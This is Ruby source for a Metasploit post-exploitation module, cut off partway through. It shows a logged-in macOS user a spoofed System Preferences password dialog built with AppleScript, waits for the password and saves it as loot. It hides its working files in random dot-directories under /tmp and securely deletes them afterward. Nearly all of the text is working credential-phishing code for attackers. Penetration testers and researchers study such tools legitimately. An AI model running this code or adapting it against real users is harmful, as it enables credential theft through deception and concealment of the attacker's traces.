## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report def initialize(info={}) super( update_info( info, 'Name' => 'OSX Password Prompt Spoof', 'Description' => %q{ Presents a password prompt dialog to a logged-in OSX user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Joff Thyer ', # original post module 'joev ' # bug fixes ], 'Platform' => [ 'osx' ], 'References' => [ ['URL', 'http://blog.packetheader.net/2011/10/fun-with-applescript.html'] ], 'SessionTypes' => [ "shell", "meterpreter" ] )) register_options([ OptString.new( 'TEXTCREDS', [ true, 'Text displayed when asking for password', 'Type your password to allow System Preferences to make changes' ] ), OptString.new( 'ICONFILE', [ true, 'Icon filename relative to bundle', 'UserUnknownIcon.icns' ] ), OptString.new( 'BUNDLEPATH', [ true, 'Path to bundle containing icon', '/System/Library/CoreServices/CoreTypes.bundle' ] ), OptInt.new('TIMEOUT', [true, 'Timeout for user to enter credentials', 60]) ], self.class) end def cmd_exec(str) print_status "Running cmd '#{str}'..." super end # Run Method for when run command is issued def run if client.nil? print_error("Invalid session ID selected. Make sure the host isn't dead.") return end host = case session.type when /meterpreter/ sysinfo["Computer"] when /shell/ cmd_exec("/bin/hostname").chomp end print_status("Running module against #{host}") dir = "/tmp/." + Rex::Text.rand_text_alpha((rand(8)+6)) runme = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6)) creds_osa = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6)) creds = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6)) pass_file = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6)) username = cmd_exec("/usr/bin/whoami").strip cmd_exec("umask 0077") cmd_exec("/bin/mkdir #{dir}") # write the script that will launch things write_file(runme, run_script) cmd_exec("/bin/chmod 700 #{runme}") # write the credentials script, compile and run write_file(creds_osa,creds_script(pass_file)) cmd_exec("/usr/bin/osacompile -o #{creds} #{creds_osa}") cmd_exec("#{runme} #{creds}") print_status("Waiting for user '#{username}' to enter credentials...") timeout = ::Time.now.to_f + datastore['TIMEOUT'].to_i pass_found = false while (::Time.now.to_f < timeout) if ::File.exist?(pass_file) print_status("Password entered! What a nice compliant user...") pass_found = true break end Rex.sleep(0.5) end if pass_found password_data = read_file("#{pass_file}").strip print_good("password file contents: #{password_data}") passf = store_loot("password", "text/plain", session, password_data, "passwd.pwd", "OSX Password") print_good("Password data stored as loot in: #{passf}") else print_status("Timeout period expired before credentials were entered!") end print_status("Cleaning up files in #{host}:#{dir}") cmd_exec("/usr/bin/srm -rf #{dir}") end # "wraps" the #creds_script applescript and allows it to make UI calls def run_script %Q{ #!/bin/bash osascript <